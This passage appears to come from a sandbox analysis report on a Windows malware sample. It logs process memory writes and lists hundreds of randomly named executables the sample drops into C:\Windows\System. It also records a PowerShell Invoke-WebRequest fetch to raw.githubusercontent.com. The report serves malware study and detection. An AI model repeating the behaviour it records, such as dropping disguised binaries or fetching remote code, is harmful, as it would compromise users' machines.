PID 2764 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\JzdoPEB.exe
PID 2764 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\JzdoPEB.exe
PID 2764 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\JzdoPEB.exe
PID 2764 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\VlXazjk.exe
PID 2764 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\VlXazjk.exe
PID 2764 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\VlXazjk.exe
PID 2764 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ndXGGpK.exe
PID 2764 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ndXGGpK.exe
PID 2764 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ndXGGpK.exe
PID 2764 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\eqEWWtA.exe
PID 2764 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\eqEWWtA.exe
PID 2764 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\eqEWWtA.exe
PID 2764 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\KsKApsH.exe
PID 2764 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\KsKApsH.exe
PID 2764 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\KsKApsH.exe
PID 2764 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\wHcmFkc.exe
PID 2764 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\wHcmFkc.exe
PID 2764 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\wHcmFkc.exe
PID 2764 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\wTNkYxh.exe
PID 2764 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\wTNkYxh.exe
PID 2764 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\wTNkYxh.exe
PID 2764 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\imNdmOx.exe
PID 2764 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\imNdmOx.exe
PID 2764 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\imNdmOx.exe
PID 2764 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\jsLedUI.exe
PID 2764 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\jsLedUI.exe
PID 2764 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\jsLedUI.exe
PID 2764 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\DyiqsAf.exe
PID 2764 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\DyiqsAf.exe
PID 2764 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\DyiqsAf.exe
PID 2764 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ENwIaBS.exe
PID 2764 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ENwIaBS.exe
PID 2764 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ENwIaBS.exe
PID 2764 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\NNoEWkv.exe
PID 2764 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\NNoEWkv.exe
PID 2764 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\NNoEWkv.exe
PID 2764 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\hQiMafa.exe
PID 2764 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\hQiMafa.exe
PID 2764 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\hQiMafa.exe
PID 2764 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\PKvqyuA.exe
PID 2764 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\PKvqyuA.exe
PID 2764 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\PKvqyuA.exe
PID 2764 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\kcJdNxc.exe
PID 2764 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\kcJdNxc.exe
PID 2764 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\kcJdNxc.exe
PID 2764 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\gyCwhPi.exe
PID 2764 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\gyCwhPi.exe
PID 2764 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\gyCwhPi.exe
PID 2764 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\KPKlOrK.exe
PID 2764 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\KPKlOrK.exe
PID 2764 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\KPKlOrK.exe
PID 2764 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\hPOwnzY.exe
PID 2764 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\hPOwnzY.exe
PID 2764 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\hPOwnzY.exe
PID 2764 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ysiLQfc.exe
PID 2764 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ysiLQfc.exe
PID 2764 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\ysiLQfc.exe
PID 2764 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe C:\Windows\System\GBXJJMd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\3328c1064b090f7c9f24b2a6dc1f8290_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\irnYcmS.exe

C:\Windows\System\irnYcmS.exe

C:\Windows\System\JzdoPEB.exe

C:\Windows\System\JzdoPEB.exe

C:\Windows\System\VlXazjk.exe

C:\Windows\System\VlXazjk.exe

C:\Windows\System\ndXGGpK.exe

C:\Windows\System\ndXGGpK.exe

C:\Windows\System\eqEWWtA.exe

C:\Windows\System\eqEWWtA.exe

C:\Windows\System\KsKApsH.exe

C:\Windows\System\KsKApsH.exe

C:\Windows\System\wHcmFkc.exe

C:\Windows\System\wHcmFkc.exe

C:\Windows\System\wTNkYxh.exe

C:\Windows\System\wTNkYxh.exe

C:\Windows\System\imNdmOx.exe

C:\Windows\System\imNdmOx.exe

C:\Windows\System\jsLedUI.exe

C:\Windows\System\jsLedUI.exe

C:\Windows\System\DyiqsAf.exe

C:\Windows\System\DyiqsAf.exe

C:\Windows\System\ENwIaBS.exe

C:\Windows\System\ENwIaBS.exe

C:\Windows\System\NNoEWkv.exe

C:\Windows\System\NNoEWkv.exe

C:\Windows\System\hQiMafa.exe

C:\Windows\System\hQiMafa.exe

C:\Windows\System\PKvqyuA.exe

C:\Windows\System\PKvqyuA.exe

C:\Windows\System\kcJdNxc.exe

C:\Windows\System\kcJdNxc.exe

C:\Windows\System\gyCwhPi.exe

C:\Windows\System\gyCwhPi.exe

C:\Windows\System\KPKlOrK.exe

C:\Windows\System\KPKlOrK.exe

C:\Windows\System\hPOwnzY.exe

C:\Windows\System\hPOwnzY.exe

C:\Windows\System\ysiLQfc.exe

C:\Windows\System\ysiLQfc.exe

C:\Windows\System\GBXJJMd.exe

C:\Windows\System\GBXJJMd.exe

C:\Windows\System\YiKNMsk.exe

C:\Windows\System\YiKNMsk.exe

C:\Windows\System\imXwvzV.exe

C:\Windows\System\imXwvzV.exe

C:\Windows\System\mHbVdcn.exe

C:\Windows\System\mHbVdcn.exe

C:\Windows\System\BEExAhH.exe

C:\Windows\System\BEExAhH.exe

C:\Windows\System\pnxCrZd.exe

C:\Windows\System\pnxCrZd.exe

C:\Windows\System\dnxtNlp.exe

C:\Windows\System\dnxtNlp.exe

C:\Windows\System\OAhIsyR.exe

C:\Windows\System\OAhIsyR.exe

C:\Windows\System\lkYiSyZ.exe

C:\Windows\System\lkYiSyZ.exe

C:\Windows\System\KQxgSSw.exe

C:\Windows\System\KQxgSSw.exe

C:\Windows\System\slssFJi.exe

C:\Windows\System\slssFJi.exe

C:\Windows\System\NOZrvRT.exe

C:\Windows\System\NOZrvRT.exe

C:\Windows\System\IZBoJFY.exe

C:\Windows\System\IZBoJFY.exe

C:\Windows\System\xRfHUFL.exe

C:\Windows\System\xRfHUFL.exe

C:\Windows\System\BKQrKyf.exe

C:\Windows\System\BKQrKyf.exe

C:\Windows\System\nddDEJe.exe

C:\Windows\System\nddDEJe.exe

C:\Windows\System\VOZdBZY.exe

C:\Windows\System\VOZdBZY.exe

C:\Windows\System\DepJzop.exe

C:\Windows\System\DepJzop.exe

C:\Windows\System\jqYJXsZ.exe

C:\Windows\System\jqYJXsZ.exe

C:\Windows\System\YzFnXPm.exe

C:\Windows\System\YzFnXPm.exe

C:\Windows\System\WAQgkov.exe

C:\Windows\System\WAQgkov.exe

C:\Windows\System\wxdRBsn.exe

C:\Windows\System\wxdRBsn.exe

C:\Windows\System\sERrPxB.exe

C:\Windows\System\sERrPxB.exe

C:\Windows\System\gmuIWqp.exe

C:\Windows\System\gmuIWqp.exe

C:\Windows\System\jqeXgBE.exe

C:\Windows\System\jqeXgBE.exe

C:\Windows\System\AXlnsMY.exe

C:\Windows\System\AXlnsMY.exe

C:\Windows\System\riKjyno.exe

C:\Windows\System\riKjyno.exe

C:\Windows\System\apthxWQ.exe

C:\Windows\System\apthxWQ.exe

C:\Windows\System\zDtlIKv.exe

C:\Windows\System\zDtlIKv.exe

C:\Windows\System\DWKBzmg.exe

C:\Windows\System\DWKBzmg.exe

C:\Windows\System\DKyoSSo.exe

C:\Windows\System\DKyoSSo.exe

C:\Windows\System\RTKOpZk.exe

C:\Windows\System\RTKOpZk.exe

C:\Windows\System\dXVzYQP.exe

C:\Windows\System\dXVzYQP.exe

C:\Windows\System\yuZjvNR.exe

C:\Windows\System\yuZjvNR.exe

C:\Windows\System\ESQrnON.exe

C:\Windows\System\ESQrnON.exe

C:\Windows\System\IvmaDpn.exe

C:\Windows\System\IvmaDpn.exe

C:\Windows\System\eBjOiwu.exe

C:\Windows\System\eBjOiwu.exe

C:\Windows\System\dtjrvka.exe

C:\Windows\System\dtjrvka.exe

C:\Windows\System\uWtsiRF.exe

C:\Windows\System\uWtsiRF.exe

C:\Windows\System\CIuOcjx.exe

C:\Windows\System\CIuOcjx.exe

C:\Windows\System\UqljBXK.exe

C:\Windows\System\UqljBXK.exe

C:\Windows\System\ToWiSBh.exe

C:\Windows\System\ToWiSBh.exe

C:\Windows\System\endeXWz.exe

C:\Windows\System\endeXWz.exe

C:\Windows\System\cpKZnmi.exe

C:\Windows\System\cpKZnmi.exe

C:\Windows\System\CuiWWSD.exe

C:\Windows\System\CuiWWSD.exe

C:\Windows\System\MpCaCEF.exe

C:\Windows\System\MpCaCEF.exe

C:\Windows\System\xNOMJsa.exe

C:\Windows\System\xNOMJsa.exe

C:\Windows\System\ULiyWAs.exe

C:\Windows\System\ULiyWAs.exe

C:\Windows\System\FEKPkeS.exe

C:\Windows\System\FEKPkeS.exe

C:\Windows\System\oBepVDF.exe

C:\Windows\System\oBepVDF.exe

C:\Windows\System\XNOifRr.exe

C:\Windows\System\XNOifRr.exe

C:\Windows\System\WuYkRSk.exe

C:\Windows\System\WuYkRSk.exe

C:\Windows\System\VVHQKUI.exe

C:\Windows\System\VVHQKUI.exe

C:\Windows\System\FthshMG.exe

C:\Windows\System\FthshMG.exe

C:\Windows\System\rfNKTHf.exe

C:\Windows\System\rfNKTHf.exe

C:\Windows\System\QYymwAx.exe

C:\Windows\System\QYymwAx.exe

C:\Windows\System\UOaCvil.exe

C:\Windows\System\UOaCvil.exe

C:\Windows\System\FUlFyjY.exe

C:\Windows\System\FUlFyjY.exe

C:\Windows\System\mePdYzG.exe

C:\Windows\System\mePdYzG.exe

C:\Windows\System\BZfhMqC.exe

C:\Windows\System\BZfhMqC.exe

C:\Windows\System\VwtmMmy.exe

C:\Windows\System\VwtmMmy.exe

C:\Windows\System\CEBTcag.exe

C:\Windows\System\CEBTcag.exe

C:\Windows\System\GtJViOB.exe

C:\Windows\System\GtJViOB.exe

C:\Windows\System\LyXpfzP.exe

C:\Windows\System\LyXpfzP.exe

C:\Windows\System\shqVVYj.exe

C:\Windows\System\shqVVYj.exe

C:\Windows\System\bBqSbCZ.exe

C:\Windows\System\bBqSbCZ.exe

C:\Windows\System\QAudvAQ.exe

C:\Windows\System\QAudvAQ.exe

C:\Windows\System\dpBpoMS.exe

C:\Windows\System\dpBpoMS.exe

C:\Windows\System\uLXFCMV.exe

C:\Windows\System\uLXFCMV.exe

C:\Windows\System\gvCGEGB.exe

C:\Windows\System\gvCGEGB.exe

C:\Windows\System\DEcDLce.exe

C:\Windows\System\DEcDLce.exe

C:\Windows\System\IDUXkUY.exe

C:\Windows\System\IDUXkUY.exe

C:\Windows\System\coAJDYd.exe

C:\Windows\System\coAJDYd.exe

C:\Windows\System\QgReoiq.exe

C:\Windows\System\QgReoiq.exe

C:\Windows\System\ZcRiPJi.exe

C:\Windows\System\ZcRiPJi.exe

C:\Windows\System\CpYegAx.exe

C:\Windows\System\CpYegAx.exe

C:\Windows\System\tgOEGxs.exe

C:\Windows\System\tgOEGxs.exe

C:\Windows\System\bbXErCj.exe

C:\Windows\System\bbXErCj.exe

C:\Windows\System\XHyMTJN.exe

C:\Windows\System\XHyMTJN.exe

C:\Windows\System\WeuYQII.exe

C:\Windows\System\WeuYQII.exe

C:\Windows\System\YXAvMpY.exe

C:\Windows\System\YXAvMpY.exe

C:\Windows\System\mWXkZPz.exe

C:\Windows\System\mWXkZPz.exe

C:\Windows\System\KleIaPV.exe

C:\Windows\System\KleIaPV.exe

C:\Windows\System\laPablE.exe

C:\Windows\System\laPablE.exe

C:\Windows\System\kRrLFgD.exe

C:\Windows\System\kRrLFgD.exe

C:\Windows\System\eHcAXMT.exe

C:\Windows\System\eHcAXMT.exe

C:\Windows\System\FHiwDLz.exe

C:\Windows\System\FHiwDLz.exe

C:\Windows\System\XuUGlbK.exe

C:\Windows\System\XuUGlbK.exe

C:\Windows\System\VrHENVj.exe

C:\Windows\System\VrHENVj.exe

C:\Windows\System\jMwIBWT.exe

C:\Windows\System\jMwIBWT.exe

C:\Windows\System\IpovXwl.exe

C:\Windows\System\IpovXwl.exe

C:\Windows\System\QAYeSJJ.exe

C:\Windows\System\QAYeSJJ.exe

C:\Windows\System\KwiFhFi.exe

C:\Windows\System\KwiFhFi.exe

C:\Windows\System\unxSMDd.exe

C:\Windows\System\unxSMDd.exe

C:\Windows\System\rwULhWV.exe

C:\Windows\System\rwULhWV.exe

C:\Windows\System\UFWFvJC.exe

C:\Windows\System\UFWFvJC.exe

C:\Windows\System\LCeMRXo.exe

C:\Windows\System\LCeMRXo.exe

C:\Windows\System\PhwepLt.exe

C:\Windows\System\PhwepLt.exe

C:\Windows\System\VFIrDlB.exe

C:\Windows\System\VFIrDlB.exe

C:\Windows\System\VtqoWCW.exe

C:\Windows\System\VtqoWCW.exe

C:\Windows\System\XJaRgAJ.exe

C:\Windows\System\XJaRgAJ.exe

C:\Windows\System\lbWkBZY.exe

C:\Windows\System\lbWkBZY.exe

C:\Windows\System\IhFrGsx.exe

C:\Windows\System\IhFrGsx.exe

C:\Windows\System\IECgsxF.exe

C:\Windows\System\IECgsxF.exe

C:\Windows\System\inIYRha.exe

C:\Windows\System\inIYRha.exe

C:\Windows\System\gBCYAIs.exe

C:\Windows\System\gBCYAIs.exe

C:\Windows\System\NGXGzKP.exe

C:\Windows\System\NGXGzKP.exe

C:\Windows\System\eGHitIn.exe

C:\Windows\System\eGHitIn.exe

C:\Windows\System\RcdwpSL.exe

C:\Windows\System\RcdwpSL.exe

C:\Windows\System\xzWtRae.exe

C:\Windows\System\xzWtRae.exe

C:\Windows\System\FSPIess.exe

C:\Windows\System\FSPIess.exe

C:\Windows\System\hvZxkjR.exe

C:\Windows\System\hvZxkjR.exe

C:\Windows\System\BPSZxak.exe

C:\Windows\System\BPSZxak.exe

C:\Windows\System\QZzuFaC.exe

C:\Windows\System\QZzuFaC.exe

C:\Windows\System\ZqdZzqo.exe

C:\Windows\System\ZqdZzqo.exe

C:\Windows\System\VGBpsdi.exe

C:\Windows\System\VGBpsdi.exe

C:\Windows\System\OTOeMrE.exe

C:\Windows\System\OTOeMrE.exe

C:\Windows\System\AGikEbV.exe

C:\Windows\System\AGikEbV.exe

C:\Windows\System\pQTlosL.exe

C:\Windows\System\pQTlosL.exe

C:\Windows\System\upFLwnb.exe

C:\Windows\System\upFLwnb.exe

C:\Windows\System\NLJyUWE.exe

C:\Windows\System\NLJyUWE.exe

C:\Windows\System\zfYGkQx.exe

C:\Windows\System\zfYGkQx.exe

C:\Windows\System\lgrWDxX.exe

C:\Windows\System\lgrWDxX.exe

C:\Windows\System\AuTDiVU.exe

C:\Windows\System\AuTDiVU.exe

C:\Windows\System\mQMYIRk.exe

C:\Windows\System\mQMYIRk.exe

C:\Windows\System\XCzHJIl.exe

C:\Windows\System\XCzHJIl.exe

C:\Windows\System\NzWvjvi.exe

C:\Windows\System\NzWvjvi.exe

C:\Windows\System\PbJOQkV.exe

C:\Windows\System\PbJOQkV.exe

C:\Windows\System\HyoTkCJ.exe

C:\Windows\System\HyoTkCJ.exe

C:\Windows\System\BQObYxc.exe

C:\Windows\System\BQObYxc.exe

C:\Windows\System\JIWpPBh.exe

C:\Windows\System\JIWpPBh.exe

C:\Windows\System\sXdDqXG.exe

C:\Windows\System\sXdDqXG.exe

C:\Windows\System\npXkoCt.exe

C:\Windows\System\npXkoCt.exe

C:\Windows\System\AVeQfVa.exe

C:\Windows\System\AVeQfVa.exe

C:\Windows\System\qddjEnU.exe

C:\Windows\System\qddjEnU.exe

C:\Windows\System\RMkNUgh.exe

C:\Windows\System\RMkNUgh.exe

C:\Windows\System\ZtaBqcR.exe

C:\Windows\System\ZtaBqcR.exe

C:\Windows\System\RDlPqnu.exe

C:\Windows\System\RDlPqnu.exe

C:\Windows\System\ZBVELKl.exe

C:\Windows\System\ZBVELKl.exe

C:\Windows\System\sgekwqz.exe

C:\Windows\System\sgekwqz.exe

C:\Windows\System\StzzEpz.exe

C:\Windows\System\StzzEpz.exe

C:\Windows\System\jeCapqA.exe

C:\Windows\System\jeCapqA.exe

C:\Windows\System\WgajAxf.exe

C:\Windows\System\WgajAxf.exe

C:\Windows\System\cFMZssw.exe

C:\Windows\System\cFMZssw.exe

C:\Windows\System\wYRafog.exe

C:\Windows\System\wYRafog.exe

C:\Windows\System\oCZfFja.exe

C:\Windows\System\oCZfFja.exe

C:\Windows\System\zXhnCmQ.exe

C:\Windows\System\zXhnCmQ.exe

C:\Windows\System\zFnimBm.exe

C:\Windows\System\zFnimBm.exe

C:\Windows\System\BUmpzxs.exe

C:\Windows\System\BUmpzxs.exe

C:\Windows\System\NjiJcqE.exe

C:\Windows\System\NjiJcqE.exe

C:\Windows\System\rukrKQJ.exe

C:\Windows\System\rukrKQJ.exe

C:\Windows\System\FxznJhw.exe

C:\Windows\System\FxznJhw.exe

C:\Windows\System\wFBXJmK.exe

C:\Windows\System\wFBXJmK.exe

C:\Windows\System\VFzAfSx.exe

C:\Windows\System\VFzAfSx.exe

C:\Windows\System\IbzPQKM.exe

C:\Windows\System\IbzPQKM.exe

C:\Windows\System\wcpoaUB.exe

C:\Windows\System\wcpoaUB.exe

C:\Windows\System\UMfUThv.exe

C:\Windows\System\UMfUThv.exe

C:\Windows\System\NVOQFaX.exe

C:\Windows\System\NVOQFaX.exe

C:\Windows\System\IrwcGti.exe

C:\Windows\System\IrwcGti.exe

C:\Windows\System\ysFwGOn.exe

C:\Windows\System\ysFwGOn.exe

C:\Windows\System\ftkyRUQ.exe

C:\Windows\System\ftkyRUQ.exe

C:\Windows\System\SjqJVKz.exe

C:\Windows\System\SjqJVKz.exe

C:\Windows\System\mDDzwRr.exe

C:\Windows\System\mDDzwRr.exe

C:\Windows\System\nMVhYmy.exe

C:\Windows\System\nMVhYmy.exe

C:\Windows\System\XcScDam.exe

C:\Windows\System\XcScDam.exe

C:\Windows\System\FfHeuQT.exe

C:\Windows\System\FfHeuQT.exe

C:\Windows\System\YgrnNtV.exe

C:\Windows\System\YgrnNtV.exe

C:\Windows\System\NKGKpWT.exe

C:\Windows\System\NKGKpWT.exe

C:\Windows\System\tQJLUHK.exe

C:\Windows\System\tQJLUHK.exe

C:\Windows\System\lNWZXMt.exe

C:\Windows\System\lNWZXMt.exe

C:\Windows\System\DGaxpnV.exe

C:\Windows\System\DGaxpnV.exe

C:\Windows\System\wEREzdj.exe

C:\Windows\System\wEREzdj.exe

C:\Windows\System\bQAhuro.exe

C:\Windows\System\bQAhuro.exe

C:\Windows\System\LTMGmrC.exe

C:\Windows\System\LTMGmrC.exe

C:\Windows\System\zYuheuu.exe

C:\Windows\System\zYuheuu.exe

C:\Windows\System\QSBkTPE.exe

C:\Windows\System\QSBkTPE.exe

C:\Windows\System\uWApWMH.exe

C:\Windows\System\uWApWMH.exe

C:\Windows\System\UgbGDGp.exe

C:\Windows\System\UgbGDGp.exe

C:\Windows\System\eNfjbUQ.exe

C:\Windows\System\eNfjbUQ.exe

C:\Windows\System\OmJsTKx.exe

C:\Windows\System\OmJsTKx.exe

C:\Windows\System\PUhUSWz.exe

C:\Windows\System\PUhUSWz.exe

C:\Windows\System\sLYOfRA.exe

C:\Windows\System\sLYOfRA.exe

C:\Windows\System\Amqphdv.exe

C:\Windows\System\Amqphdv.exe

C:\Windows\System\AJwsgHq.exe

C:\Windows\System\AJwsgHq.exe

C:\Windows\System\WmvzwNf.exe

C:\Windows\System\WmvzwNf.exe

C:\Windows\System\YtLaeOQ.exe

C:\Windows\System\YtLaeOQ.exe

C:\Windows\System\KGnUnrV.exe

C:\Windows\System\KGnUnrV.exe

C:\Windows\System\UsNiACH.exe

C:\Windows\System\UsNiACH.exe

C:\Windows\System\eILVsNE.exe

C:\Windows\System\eILVsNE.exe

C:\Windows\System\JlwcJVf.exe

C:\Windows\System\JlwcJVf.exe

C:\Windows\System\JyyDkDv.exe

C:\Windows\System\JyyDkDv.exe

C:\Windows\System\jGyrBhQ.exe

C:\Windows\System\jGyrBhQ.exe

C:\Windows\System\XsvembA.exe

C:\Windows\System\XsvembA.exe

C:\Windows\System\XZHwGgp.exe

C:\Windows\System\XZHwGgp.exe

C:\Windows\System\tXlJBjQ.exe

C:\Windows\System\tXlJBjQ.exe

C:\Windows\System\JujKskN.exe

C:\Windows\System\JujKskN.exe

C:\Windows\System\GFXbkuz.exe

C:\Windows\System\GFXbkuz.exe

C:\Windows\System\VCBbhwn.exe

C:\Windows\System\VCBbhwn.exe

C:\Windows\System\SDgwxgW.exe

C:\Windows\System\SDgwxgW.exe

C:\Windows\System\KscfuEM.exe

C:\Windows\System\KscfuEM.exe

C:\Windows\System\WPDjVvF.exe

C:\Windows\System\WPDjVvF.exe

C:\Windows\System\NQlFqBc.exe

C:\Windows\System\NQlFqBc.exe

C:\Windows\System\ZJVinfy.exe

C:\Windows\System\ZJVinfy.exe

C:\Windows\System\TsteDWm.exe

C:\Windows\System\TsteDWm.exe

C:\Windows\System\ptQqPHD.exe

C:\Windows\System\ptQqPHD.exe

C:\Windows\System\DODlWwI.exe

C:\Windows\System\DODlWwI.exe

C:\Windows\System\auYDXZR.exe

C:\Windows\System\auYDXZR.exe

C:\Windows\System\FDFSCtu.exe

C:\Windows\System\FDFSCtu.exe

C:\Windows\System\qygPBNF.exe

C:\Windows\System\qygPBNF.exe

C:\Windows\System\NLclVMo.exe

C:\Windows\System\NLclVMo.exe

C:\Windows\System\gcLKyuA.exe

C:\Windows\System\gcLKyuA.exe

C:\Windows\System\aKiIAwx.exe

C:\Windows\System\aKiIAwx.exe

C:\Windows\System\WGcbqTI.exe

C:\Windows\System\WGcbqTI.exe

C:\Windows\System\ibBfhbZ.exe

C:\Windows\System\ibBfhbZ.exe

